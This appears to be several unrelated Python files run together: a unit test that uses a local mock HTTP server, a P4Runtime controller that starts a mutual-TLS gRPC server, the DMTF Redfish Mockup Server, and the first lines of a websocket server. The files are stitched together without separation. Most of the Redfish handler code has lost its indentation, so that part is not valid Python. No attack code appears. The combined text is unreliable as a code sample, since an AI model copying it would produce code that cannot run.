        # super(MockServerRequestHandler, self).log_message(format, *args)
        pass

    def log_message(self, format, *args):
        pass

    def do_GET(self):
        # Serve the fixture named by the final path component.
        parts = self.path.split('/')
        prop = parts[len(parts)-1]
        if prop not in MockServerRequestHandler.files:
            self.send_error(404, MockServerRequestHandler.FILE_NOT_FOUND_ERROR_MESSAGE)
            return
        # Add response status code.
        self.send_response(200)
        # Add response headers.
        # self.send_header('Content-Type', 'application/json; charset=utf-8')
        self.end_headers()
        # Add response content.
        self.wfile.write(MockServerRequestHandler.files[prop])
        return
class TestPythonBrfiedShortcutSyncHttp(TestCase):
    """Tests for the sync_http shortcuts, backed by a local mock HTTP
    server (plus two live FTP round-trips against ftp.datasus.gov.br)."""

    def setUp(self):
        # Rebuild all test URLs from the port chosen in setUpClass.
        self.port = TestPythonBrfiedShortcutSyncHttp.mock_server_port
        self.file_not_found = "http://localhost:%d/file_not_found" % self.port
        self.file01_csv_url = "http://localhost:%d/file01_csv" % self.port
        self.file01_zip_url = "http://localhost:%d/file01_zip" % self.port
        self.file02_json_url = "http://localhost:%d/file02_json" % self.port
        self.file02_zip_url = "http://localhost:%d/file02_zip" % self.port
        self.example01_are_right_fwf_zip_url = "http://localhost:%d/example01_are_right.fwf.zip" % self.port

    @classmethod
    def setUpClass(cls):
        # https://realpython.com/testing-third-party-apis-with-mock-servers/
        # Configure mock server.
        cls.mock_server_port = get_free_port()
        cls.mock_server = HTTPServer(('localhost', cls.mock_server_port), MockServerRequestHandler)
        # Start running mock server in a separate thread.
        # Daemon threads automatically shut down when the main process exits.
        cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
        # FIX: Thread.setDaemon() is deprecated since Python 3.10 (removed
        # in 3.13); assign the daemon attribute instead.
        cls.mock_server_thread.daemon = True
        cls.mock_server_thread.start()

    # @httpretty.activate
    def test_get(self):
        self.assertRaisesRegex(HTTPException, MockServerRequestHandler.FILE_NOT_FOUND_ERROR_MESSAGE,
                               get, self.file_not_found)
        # Inspect the exception attributes carried by the 404 failure.
        try:
            self.assertIsNotNone(get(self.file_not_found))
        except Exception as exc:
            self.assertEqual(404, getattr(exc, 'status', None))
            self.assertEqual('File not found', getattr(exc, 'reason', None))
            self.assertTrue('Content-Type' in getattr(exc, 'headers'))
            self.assertEqual(self.file_not_found, getattr(exc, 'url', None))
        # Binary payloads cannot be decoded as text.
        self.assertRaises(UnicodeDecodeError, get, self.file01_zip_url, None)
        self.assertEqual(FILE01_CSV_EXPECTED, get(self.file01_csv_url))
        self.assertEqual(FILE01_CSV_EXPECTED_BINARY, get(self.file01_csv_url, encoding=None))
        self.assertEqual(FILE01_CSV_EXPECTED_LATIN1, get(self.file01_csv_url, encoding='latin1'))
        self.assertEqual(FILE02_JSON_EXPECTED, get(self.file02_json_url))
        self.assertEqual(FILE02_JSON_EXPECTED_BINARY, get(self.file02_json_url, encoding=None))
        self.assertEqual(FILE02_JSON_EXPECTED_LATIN1, get(self.file02_json_url, encoding='latin1'))
        self.assertEqual(ZIP_EXPECTED, get(self.file01_zip_url, encoding=None))
        self.assertEqual('file.csv', get_zip(self.file01_zip_url).filelist[0].filename)

    def test_get_ftp(self):
        # Live FTP request; requires network access to datasus.gov.br.
        self.assertEqual("04/09/2012 12:24:13\r\n", get("ftp://ftp.datasus.gov.br/cnes/informe_cnes.txt"))

    def test_get_json(self):
        self.assertEqual(JSON_EXPECTED, get_json(self.file02_json_url))

    def test_get_zip(self):
        self.assertIsInstance(get_zip(self.file01_zip_url), ZipFile)
        self.assertIsInstance(get_zip(self.file01_zip_url).filelist[0], ZipInfo)
        self.assertEqual('file.csv', get_zip(self.file01_zip_url).filelist[0].filename)

    def test_get_zip_content(self):
        self.assertEqual(FILE01_CSV_EXPECTED, get_zip_content(self.file01_zip_url))

    def test_get_zip_content_ftp(self):
        # Live FTP request; requires network access to datasus.gov.br.
        with open("assets/IMPORT_201711.txt") as f:
            expected = f.read()
        self.assertEqual(expected, get_zip_content("ftp://ftp.datasus.gov.br/cnes/IMPORT_201711.ZIP").replace("\r", ""))

    def test_get_zip_csv_content(self):
        self.assertEqual(CSV_EXPECTED, get_zip_csv_content(self.file01_zip_url, unzip_kwargs={"delimiter": ';'}))

    def test_get_zip_fwf_content(self):
        self.assertEqual(FWF_EXPECTED, get_zip_fwf_content(self.example01_are_right_fwf_zip_url, FILE_DESCRIPTOR,
                                                           newline="\n"))
#!/usr/bin/env python2
# Copyright 2018-present University of Tuebingen, Chair of Communication Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Marco Haeberle (marco.haeberle@uni-tuebingen.de)
#
#
import grpc
from concurrent import futures
import time
import sys
import threading
import argparse
import cli
# import generated proto classes
import topo_pb2, topo_pb2_grpc
import topo_server
import control_client
# define some variables
ca_path = '../tools/certstrap/out/p4sec-ca.crt'
cert_path = '../tools/certstrap/out/localhost.crt'
key_path = '../tools/certstrap/out/localhost.key'
listen_addr = '0.0.0.0:51001'
def start_topo_server(topo, control_client):
    """Start the mutual-TLS gRPC topology server and block forever.

    topo:           shared topology dict served by TopoServer.
    control_client: ControlClient forwarded to the servicer.

    Exits the process with a message if any TLS file cannot be read.
    """
    def read_tls_file(path, description):
        # All three TLS inputs are loaded identically; the original
        # duplicated this try/open block three times.
        try:
            with open(path, 'rb') as tls_file:
                return tls_file.read()
        except IOError as e:
            print(e)
            sys.exit("Error opening " + description)

    # create a gRPC server
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    topo_pb2_grpc.add_TopoServiceServicer_to_server(topo_server.TopoServer(topo, control_client), server)

    # prepare tls creds (client certs are required: last arg is True)
    ca = read_tls_file(ca_path, "CA file")
    cert = read_tls_file(cert_path, "cert file")
    key = read_tls_file(key_path, "key file")
    server_creds = grpc.ssl_server_credentials([(key, cert)], ca, True)

    print('Starting gRPC server for clients. Listening on ' + listen_addr)
    server.add_secure_port(listen_addr, server_creds)
    server.start()

    # server.start() does not block -> sleep-loop to keep the server alive
    while True:
        time.sleep(100)
def start_cli(topo, control_client):
    """Run the interactive controller CLI (blocks in cmdloop) with
    access to the shared topology and the control client."""
    print('starting cli')
    cmd = cli.CLI()
    cmd.set_topo(topo)
    cmd.set_control_client(control_client)
    cmd.cmdloop()
# parser = argparse.ArgumentParser(description='P4Runtime Controller')
# parser.add_argument('--p4info', help='p4info proto in text format from p4c', type=str, action="store", required=False,
#                     default='../p4/p4/build/basic.p4info')
# parser.add_argument('--bmv2-json', help='BMv2 JSON file from p4c', type=str, action="store", required=False,
#                     default='../p4/p4/build/basic.json')
# args = parser.parse_args()

# NOTE: this rebinds the imported `control_client` module name to the
# client instance.
control_client = control_client.ControlClient(ca_path, cert_path, key_path)

# Shared topology state, mutated by the server thread and read by the CLI.
topo = {}

topo_t = threading.Thread(target=start_topo_server, args=(topo,control_client))
topo_t.daemon = True
topo_t.start()

cli_t = threading.Thread(target=start_cli, args=(topo, control_client))
cli_t.daemon = True
cli_t.start()

# exit when CTRL-C ist pressed or when the CLI is stopped by entering 'exit'
try:
    while cli_t.is_alive():
        time.sleep(1)
except KeyboardInterrupt:
    print('shutting down')
    sys.exit(0)
# Copyright Notice:
# Copyright 2016-2019 DMTF. All rights reserved.
# License: BSD 3-Clause License. For full text see link: https://github.com/DMTF/Redfish-Mockup-Server/blob/master/LICENSE.md
# redfishMockupServer.py
# tested and developed Python 3.4
import sys
import argparse
import time
import collections
import json
import threading
import datetime
import grequests
import os
import ssl
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, urlunparse, parse_qs
from rfSsdpServer import RfSDDPServer
# Module-level logger: DEBUG at the logger, INFO on the stdout handler.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
logger.addHandler(ch)

tool_version = "1.0.8"
# Hop-by-hop headers that must not be replayed from recorded header files.
dont_send = ["connection", "keep-alive", "content-length", "transfer-encoding"]
def dict_merge(dct, merge_dct):
    """
    https://gist.github.com/angstwad/bf22d1822c38a92ec0a9 modified
    Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
    updating only top-level keys, dict_merge recurses down into dicts nested
    to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
    ``dct``.
    :param dct: dict onto which the merge is executed
    :param merge_dct: dct merged into dct
    :return: None
    """
    # FIX: the ABC aliases in `collections` (collections.Mapping) were
    # removed in Python 3.10; use collections.abc.Mapping instead.
    from collections.abc import Mapping
    for k in merge_dct:
        if (k in dct and isinstance(dct[k], dict) and isinstance(merge_dct[k], Mapping)):
            # Both sides are mappings: merge recursively.
            dict_merge(dct[k], merge_dct[k])
        else:
            # Otherwise the incoming value replaces the existing one.
            dct[k] = merge_dct[k]
def clean_path(path, isShort):
    """Normalize a request URL path for filesystem lookup.

    Strips surrounding slashes and drops any query string or fragment.
    In short-form mode the 'redfish/v1' service-root prefix is removed
    as well.

    :param path: raw request path.
    :param isShort: True when the mockup tree omits the service root.
    """
    cleaned = path.strip('/')
    # Everything from the first '?' or '#' onward is not part of the
    # resource path.
    for separator in ('?', '#'):
        cleaned = cleaned.partition(separator)[0]
    if isShort:
        cleaned = cleaned.replace('redfish/v1', '').strip('/')
    return cleaned
class RfMockupServer(BaseHTTPRequestHandler):
'''
returns index.json file for Serverthe specified URL
'''
patchedLinks = dict()
def construct_path(self, path, filename):
    """construct_path

    Map a request URL path to a location under the mockup directory,
    optionally appending a filename (e.g. 'index.json').

    :param path: raw request path (cleaned via clean_path).
    :param filename: file inside the resource directory, or ''/None for
        the directory itself.
    """
    apath = self.server.mockDir
    rpath = clean_path(path, self.server.shortForm)
    return '/'.join([ apath, rpath, filename ]) if filename not in ['', None] else '/'.join([ apath, rpath ])
def get_cached_link(self, path):
    """get_cached_link

    Return (success, payload) for a mockup file path.  Entries present
    in the patchedLinks cache take precedence over the on-disk JSON
    file; a missing file yields (False, None).  A cached value of '404'
    is treated as absent (presumably set elsewhere for deleted
    resources — not visible in this chunk).

    :param path: filesystem path as built by construct_path.
    """
    if path not in self.patchedLinks:
        if os.path.isfile(path):
            with open(path) as f:
                jsonData = json.load(f)
                f.close()  # redundant: the with-block closes f anyway
        else:
            jsonData = None
    else:
        jsonData = self.patchedLinks[path]
    return jsonData is not None and jsonData != '404', jsonData
def try_to_sleep(self, method, path):
    """try_to_sleep

    Simulate response latency before answering a request.  When
    timefromJson is set, the per-resource value from getResponseTime()
    (defined elsewhere in this class) is used, falling back to the
    server-wide default when it is not a valid float.

    :param method: HTTP method of the current request.
    :param path: request path used to look up a per-resource time.
    """
    if self.server.timefromJson:
        responseTime = self.getResponseTime(method, path)
        try:
            time.sleep(float(responseTime))
        except ValueError as e:
            logger.info("Time is not a float value. Sleeping with default response time")
            time.sleep(float(self.server.responseTime))
    else:
        time.sleep(float(self.server.responseTime))
def send_header_file(self, fpath):
    """send_header_file

    Replay the recorded GET response headers from a headers JSON file,
    skipping the hop-by-hop headers listed in dont_send.

    :param fpath: path to the recorded headers file.
    """
    with open(fpath) as headers_data:
        d = json.load(headers_data)
        if isinstance(d.get("GET"), dict):
            for k, v in d["GET"].items():
                if k.lower() not in dont_send:
                    self.send_header(k, v)
def add_new_member(self, payload, data_received):
members = payload.get('Members')
n = 1
newpath_id = data_received.get('Id', 'Member')
newpath = '/'.join([ self.path, newpath_id ])
while newpath in [m.get('@odata.id') for m in members]:
n = n + 1
newpath_id = data_received.get('Id', 'Member') + str(n)
newpath = '/'.join([ self.path, newpath_id ])
members.append({'@odata.id': newpath})
payload['Members'] = members
payload['Members@odata.count'] = len(members)
return newpath
def handle_eventing(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if ( ('EventType' not in data_received) or ('EventId' not in data_received) or
('EventTimestamp' not in data_received) or ('Severity' not in data_received) or
('Message' not in data_received) or ('MessageId' not in data_received) or
('MessageArgs' not in data_received) or ('OriginOfCondition' not in data_received) ):
return (400)
else:
# Need to reformat to make Origin Of Condition a proper link
origin_of_cond = data_received['OriginOfCondition']
data_received['OriginOfCondition'] = {}
data_received['OriginOfCondition']['@odata.id'] = origin_of_cond
event_payload = {}
event_payload['@odata.type'] = '#Event.v1_2_1.Event'
event_payload['Name'] = 'Test Event'
event_payload['Id'] = str(self.event_id)
event_payload['Events'] = []
event_payload['Events'].append(data_received)
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
logger.info((data_received['EventType'], subscription['EventTypes']))
# If the EventType in the request is one of interest to the subscriber, build an event payload
if data_received['EventType'] in subscription['EventTypes']:
http_headers = {}
http_headers['Content-Type'] = 'application/json'
event_payload['Context'] = subscription.get('Context', 'Default Context')
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
return (204)
self.event_id = self.event_id + 1
def handle_telemetry(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if (('MetricReportName' in data_received) and ('MetricReportValues' in data_received)) or\
(('MetricReportName' in data_received) and ('GeneratedMetricReportValues' in data_received)) or\
(('MetricName' in data_received) and ('MetricValues' in data_received)):
# If the EventType in the request is one of interest to the subscriber, build an event payload
expected_keys = ['MetricId', 'MetricValue', 'Timestamp', 'MetricProperty', 'MetricDefinition']
other_keys = ['MetricProperty']
my_name = data_received.get('MetricName',
data_received.get('MetricReportName'))
my_data = data_received.get('MetricValues',
data_received.get('MetricReportValues',
data_received.get('GeneratedMetricReportValues')))
event_payload = {}
value_list = []
# event_payload['@Redfish.Copyright'] = 'Copyright 2014-2016 Distributed Management Task Force, Inc. (DMTF). All rights reserved.'
event_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReport.MetricReport'
event_payload['@odata.type'] = '#MetricReport.v1_0_0.MetricReport'
event_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports/' + my_name
event_payload['Id'] = my_name
event_payload['Name'] = my_name
event_payload['MetricReportDefinition'] = {
"@odata.id": "/redfish/v1/TelemetryService/MetricReportDefinitions/" + my_name}
now = datetime.datetime.now()
event_payload['Timestamp'] = now.strftime('%Y-%m-%dT%H:%M:%S') + ('-%02d' % (now.microsecond / 10000))
for tup in my_data:
if all(x in tup for x in expected_keys):
# uncomment for stricter payload check
# ex: if all(x in expected_keys + other_keys for x in tup):
value_list.append(tup)
event_payload['MetricValues'] = value_list
logger.info(event_payload)
# construct path "mockdir/path/to/resource/<filename>"
event_fpath = self.construct_path(event_payload['@odata.id'], 'index.json')
self.patchedLinks[event_fpath] = event_payload
report_path = '/redfish/v1/TelemetryService/MetricReports'
report_path = self.construct_path(report_path, 'index.json')
success, collection_payload = self.get_cached_link(report_path)
if not success:
collection_payload = {'Members': []}
collection_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReportCollection.MetricReportCollection'
collection_payload['@odata.type'] = '#MetricReportCollection.v1_0_0.MetricReportCollection'
collection_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports'
collection_payload['Name'] = 'MetricReports'
if event_payload['@odata.id'] not in [member.get('@odata.id') for member in collection_payload['Members']]:
collection_payload['Members'].append({'@odata.id': event_payload['@odata.id']})
collection_payload['Members@odata.count'] = len(collection_payload['Members'])
self.patchedLinks[report_path] = collection_payload
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
http_headers = {}
http_headers['Content-Type'] = 'application/json'
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
self.event_id = self.event_id + 1
return (204)
else:
return (400)
server_version = "RedfishMockupHTTPD_v" + tool_version
event_id = 1
# Headers only request
def do_HEAD(self):
"""do_HEAD"""
logger.info("Headers: ")
logger.info(self.server.headers)
# construct path "mockdir/path/to/resource/headers.json"
fpath = self.construct_path(self.path, 'index.json')
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
# If bool headers is true and headers.json exists...
# else, send normal headers for given resource
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_response(200)
self.send_header_file(fpath_headers)
elif (self.server.headers is False) or (os.path.isfile(fpath_headers) is False):
if self.get_cached_link(fpath)[0]:
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
elif os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
else:
self.send_response(404)
else:
self.send_response(404)
self.end_headers()
def do_GET(self):
"""do_GET"""
# for GETs always dump the request headers to the console
# there is no request data, so no need to dump that
logger.info(("GET", self.path))
logger.info(" GET: Headers: {}".format(self.headers))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
success, payload = self.get_cached_link(fpath)
scheme, netloc, path, params, query, fragment = urlparse(self.path)
query_pieces = parse_qs(query, keep_blank_values=True)
self.try_to_sleep('GET', self.path)
# handle resource paths that don't exist for shortForm
# '/' and '/redfish'
if(self.path == '/' and self.server.shortForm):
self.send_response(404)
self.end_headers()
elif(self.path in ['/redfish', '/redfish/'] and self.server.shortForm):
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.end_headers()
self.wfile.write(json.dumps({'v1': '/redfish/v1'}, indent=4).encode())
# if this location exists in memory or as file
elif(success):
# if headers exist... send information (except for chunk info)
# end headers here (always end headers after response)
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.end_headers()
# Strip the @Redfish.Copyright property
output_data = payload
output_data.pop("@Redfish.Copyright", None)
# Query evaluate
if output_data.get('Members') is not None:
my_members = output_data['Members']
top_count = int(query_pieces.get('$top', [str(len(my_members))])[0])
top_skip = int(query_pieces.get('$skip', ['0'])[0])
my_members = my_members[top_skip:]
if top_count < len(my_members):
my_members = my_members[:top_count]
query_out = {'$skip': top_skip + top_count, '$top': top_count}
query_string = '&'.join(['{}={}'.format(k, v) for k, v in query_out.items()])
output_data['Members@odata.nextLink'] = urlunparse(('', '', path, '', query_string, ''))
else:
pass
output_data['Members'] = my_members
pass
encoded_data = json.dumps(output_data, sort_keys=True, indent=4, separators=(",", ": ")).encode()
self.wfile.write(encoded_data)
# if XML...
elif(os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct)):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
f = open(fpath_xml, "r")
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
f = open(fpath_direct, "r")
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
self.end_headers()
self.wfile.write(f.read().encode())
f.close()
else:
self.send_response(404)
self.end_headers()
def do_PATCH(self):
logger.info(" PATCH: Headers: {}".format(self.headers))
self.try_to_sleep('PATCH', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
if data_received:
logger.info(" PATCH: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# check if resource exists, otherwise 404
# if it's a file, open it, if its in memory, grab it
# 405 if Collection
# 204 if patch success
# 404 if payload DNE
# 400 if no patch payload
# end headers
if success:
# If this is a collection, throw a 405
if payload.get('Members') is not None:
self.send_response(405)
else:
# After getting resource, merge the data.
logger.info(self.headers.get('content-type'))
logger.info(data_received)
logger.info(payload)
dict_merge(payload, data_received)
logger.info(payload)
# put into self.patchedLinks
self.patchedLinks[fpath] = payload
self.send_response(204)
else:
self.send_response(404)
else:
self.send_response(400)
self.end_headers()
def do_PUT(self):
logger.info(" PUT: Headers: {}".format(self.headers))
self.try_to_sleep('PUT', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
logger.info(" PUT: Data: {}".format(data_received))
# we don't support this service
# 405
# end headers
self.send_response(405)
self.end_headers()
def do_POST(self):
logger.info(" POST: Headers: {}".format(self.headers))
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 405')
data_received = None
self.try_to_sleep('POST', self.path)
if data_received:
logger.info(" POST: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# don't bother if this item exists, otherwise, check if its an action or a file
# if file
# 405 if not Collection
# 204 if success
# 404 if no file present
if success:
if payload.get('Members') is None:
self.send_response(405)
else:
logger.info(data_received)
logger.info(type(data_received))
# with members, form unique ID
# must NOT exist in Members
# add ID to members, change count
# store as necessary in self.patchedLinks
newpath = self.add_new_member(payload, data_received)
newfpath = self.construct_path(newpath, 'index.json')
logger.info(newfpath)
self.patchedLinks[newfpath] = data_received
self.patchedLinks[fpath] = payload
self.send_response(204)
self.send_header("Location", newpath)
self.send_header("Content-Length", "0")
self.end_headers()
# eventing framework
else:
if 'EventService/Actions/EventService.SubmitTestEvent' in self.path:
r_code = self.handle_eventing(data_received)
self.send_response(r_code)
elif 'TelemetryService/Actions/TelemetryService.SubmitTestMetricReport' in self.path:
r_code = self.handle_telemetry(data_received)
self.send_response(r_code)
else:
self.send_response(404)
else:
self.send_response(405)
self.end_headers()
def do_DELETE(self):
"""
Delete a resource
"""
logger.info("DELETE: Headers: {}".format(self.headers))
self.try_to_sleep('DELETE', self.path)
fpath = self.construct_path(self.path, 'index.json')
ppath = '/'.join(self.path.split('/')[:-1])
parent_path = self.construct_path(ppath, 'index.json')
success, payload = self.get_cached_link(fpath)
# 404 if file doesn't exist
# 204 if success, override payload with 404
# modify payload to exclude expected URI, subtract count
# 405 if parent is not Collection
# end headers
if success:
success, parentData = self.get_cached_link(parent_path)
if success and parentData.get('Members') is not None:
self.patchedLinks[fpath] = '404'
parentData['Members'] = [x for x in parentData['Members'] if not x['@odata.id'] == self.path]
parentData['Members@odata.count'] = len(parentData['Members'])
self.patchedLinks[parent_path] = parentData
self.send_response(204)
else:
self.send_response(405)
else:
self.send_response(404)
self.end_headers()
# Response time calculation Algorithm
def getResponseTime(self, method, path):
fpath = self.construct_path(path, 'time.json')
success, item = self.get_cached_link(path)
if not any(x in method for x in ("GET", "HEAD", "POST", "PATCH", "DELETE")):
logger.info("Not a valid method")
return (0)
if(os.path.isfile(fpath)):
with open(fpath) as time_data:
d = json.load(time_data)
time_str = method + "_Time"
if time_str in d:
try:
float(d[time_str])
except Exception as e:
logger.info(
"Time in the json file, not a float/int value. Reading the default time.")
return (self.server.responseTime)
return (float(d[time_str]))
else:
logger.info(('response time:', self.server.responseTime))
return (self.server.responseTime)
def main():
    """Entry point: parse CLI options, validate the mockup tree, and serve it.

    Exits with status 1 on an invalid mockup directory and 2 on a bad
    response-time value.
    """
    logger.info("Redfish Mockup Server, version {}".format(tool_version))
    parser = argparse.ArgumentParser(description='Serve a static Redfish mockup.')
    parser.add_argument('-H', '--host', '--Host', default='127.0.0.1',
                        help='hostname or IP address (default 127.0.0.1)')
    parser.add_argument('-p', '--port', '--Port', default=8000, type=int,
                        help='host port (default 8000)')
    parser.add_argument('-D', '--dir', '--Dir',
                        help='path to mockup dir (may be relative to CWD)')
    parser.add_argument('-E', '--test-etag', '--TestEtag',
                        action='store_true',
                        help='(unimplemented) etag testing')
    parser.add_argument('-X', '--headers', action='store_true',
                        help='load headers from headers.json files in mockup')
    parser.add_argument('-t', '--time', default=0,
                        help='delay in seconds added to responses (float or int)')
    parser.add_argument('-T', action='store_true',
                        help='delay response based on times in time.json files in mockup')
    parser.add_argument('-s', '--ssl', action='store_true',
                        help='place server in SSL (HTTPS) mode; requires a cert and key')
    parser.add_argument('--cert', help='the certificate for SSL')
    parser.add_argument('--key', help='the key for SSL')
    parser.add_argument('-S', '--short-form', '--shortForm', action='store_true',
                        help='apply short form to mockup (omit filepath /redfish/v1)')
    parser.add_argument('-P', '--ssdp', action='store_true',
                        help='make mockup SSDP discoverable')
    args = parser.parse_args()
    hostname = args.host
    port = args.port
    mockDirPath = args.dir
    testEtagFlag = args.test_etag
    headers = args.headers
    responseTime = args.time
    timefromJson = args.T
    sslMode = args.ssl
    sslCert = args.cert
    sslKey = args.key
    shortForm = args.short_form
    ssdpStart = args.ssdp
    logger.info('Hostname: {}'.format(hostname))
    logger.info('Port: {}'.format(port))
    logger.info("Mockup directory path specified: {}".format(mockDirPath))
    logger.info("Response time: {} seconds".format(responseTime))
    # check if mockup path was specified. If not, use current working directory
    if mockDirPath is None:
        mockDirPath = os.getcwd()
    # create the full path to the top directory holding the Mockup
    mockDir = os.path.realpath(mockDirPath)  # creates real full path including path for CWD to the -D<mockDir> dir path
    logger.info("Serving Mockup in absolute path: {}".format(mockDir))
    # check that we have a valid tall mockup--with /redfish in mockDir before proceeding
    if not shortForm:
        slashRedfishDir = os.path.join(mockDir, "redfish")
        if os.path.isdir(slashRedfishDir) is not True:
            logger.info("ERROR: Invalid Mockup Directory--no /redfish directory at top. Aborting")
            sys.stderr.flush()
            sys.exit(1)
    # a short-form mockup is rooted directly at the service root index.json
    if shortForm:
        if os.path.isdir(mockDir) is not True or os.path.isfile(os.path.join(mockDir, "index.json")) is not True:
            logger.info("ERROR: Invalid Mockup Directory--dir or index.json does not exist")
            sys.stderr.flush()
            sys.exit(1)
    myServer = HTTPServer((hostname, port), RfMockupServer)
    if sslMode:
        logger.info("Using SSL with certfile: {}".format(sslCert))
        # NOTE: ssl.wrap_socket is deprecated since Python 3.7 in favor of
        # SSLContext.wrap_socket.
        myServer.socket = ssl.wrap_socket(myServer.socket, certfile=sslCert, keyfile=sslKey, server_side=True)
    # save the test flag, and real path to the mockup dir for the handler to use
    myServer.mockDir = mockDir
    myServer.testEtagFlag = testEtagFlag
    myServer.headers = headers
    myServer.timefromJson = timefromJson
    myServer.shortForm = shortForm
    try:
        myServer.responseTime = float(responseTime)
    except ValueError as e:
        logger.info("Enter an integer or float value")
        sys.exit(2)
    # myServer.me="HELLO"
    mySDDP = None
    if ssdpStart:
        # gevent monkey-patching is required by the SSDP implementation.
        from gevent import monkey
        monkey.patch_all()
        # construct path "mockdir/path/to/resource/<filename>"
        # Load the service root payload so SSDP can advertise it.
        path, filename, jsonData = '/redfish/v1', 'index.json', None
        apath = myServer.mockDir
        rpath = clean_path(path, myServer.shortForm)
        fpath = os.path.join(apath, rpath, filename) if filename not in ['', None] else os.path.join(apath, rpath)
        if os.path.isfile(fpath):
            with open(fpath) as f:
                jsonData = json.load(f)
                f.close()  # redundant: the with-block already closes f
        else:
            jsonData = None
        protocol = '{}://'.format('https' if sslMode else 'http')
        mySDDP = RfSDDPServer(jsonData, '{}{}:{}{}'.format(protocol, hostname, port, '/redfish/v1'), hostname)
    logger.info("Serving Redfish mockup on port: {}".format(port))
    try:
        if mySDDP is not None:
            # SSDP responder runs alongside the HTTP server as a daemon.
            t2 = threading.Thread(target=mySDDP.start)
            t2.daemon = True
            t2.start()
        logger.info('running Server...')
        myServer.serve_forever()
    except KeyboardInterrupt:
        pass
    myServer.server_close()
    logger.info("Shutting down http server")
# Script entry point: only executed when run directly, not on import.
if __name__ == "__main__":
    main()
'''
TODO:
1. add -L option to load json and dump output from python dictionary
2. add authentication support -- note that in redfish some api don't require auth
3. add https support
'''
|
websocket_server.py | #!/usr/bin/env python
import asyncio
import json
import queue
import threading
import numpy as np
import websockets
from club_controller import app_config
